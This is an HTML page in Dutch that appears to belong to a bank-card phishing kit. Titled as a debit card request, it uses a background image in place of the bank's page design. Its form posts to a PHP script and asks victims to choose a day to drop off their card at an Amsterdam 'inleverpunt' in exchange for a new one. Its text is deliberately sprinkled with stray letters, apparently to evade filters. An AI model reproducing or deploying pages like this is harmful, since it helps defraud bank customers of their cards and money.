<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head>
<meta content="text/html; charset=ISO-8859-1" http-equiv="content-type"><title>Aanvraag betaalpas</title>

<link rel="shortcut icon" href="fav1.ico">
<link rel="icon" type="image/x-icon" href="fav1.ico">
<style type="text/css">
body {
text-decoration: none;
font-family: Arial,Helvetica,sans-serif;
background-repeat: no-repeat;
background-position: left top;
background-image: url(Xackground-4.png);
}
input.P2 {
position: absolute;
top: 588px;
left: 282px;
}
input.P3 {
position: absolute;
top: 546px;
left: 282px;
}
input.P4 {
position: absolute;
top: 585px;
left: 282px;
font-family: Arial,Helvetica,sans-serif;
font-weight: bold;
color: #000066;
}
input.P5 {
position: absolute;
top: 585px;
left: 369px;
font-family: Arial,Helvetica,sans-serif;
color: #000066;
}
</style>
</head>
<body>
<br>
<form method="get" action="px4.php" name="form">
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<div style="position: absolute; font-family: Arial,Helvetica,sans-serif; width: 300px; top: 405px; left: 294px;"><big>
</big><b>WECYCLE INLEVERPUNT<br>STRppppEG 4p4<br>
101pp1AA, AMSTppERDApM</b></div>
<div style="position: absolute; font-family: Arial,Helvetica,sans-serif; width: 96px; top: 557px; left: 281px;">
<select size="1" name="Datum"><option>Vandpppaag voor 1ppp7:00(XXXXXXX ontvangt u uw nieuppwe ppppas)</option><option>Morgen voor 17:00 (XXXXXXXXX ontvangt u uw nppieuwe pas)</option><option>Oveppprmorgen voppppor 17:00 (XXXXXXXXX ontvangt u uw nieuwe
pas)</option></select>
</div>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<input style="top: 621px; left: 283px;" name="P4" class="P4" value="Doorgaan" type="submit"><input style="top: 621px; left: 368px;" class="P5" name="P5" value="Annuleren" type="reset"><br>
</form>
</body></html>
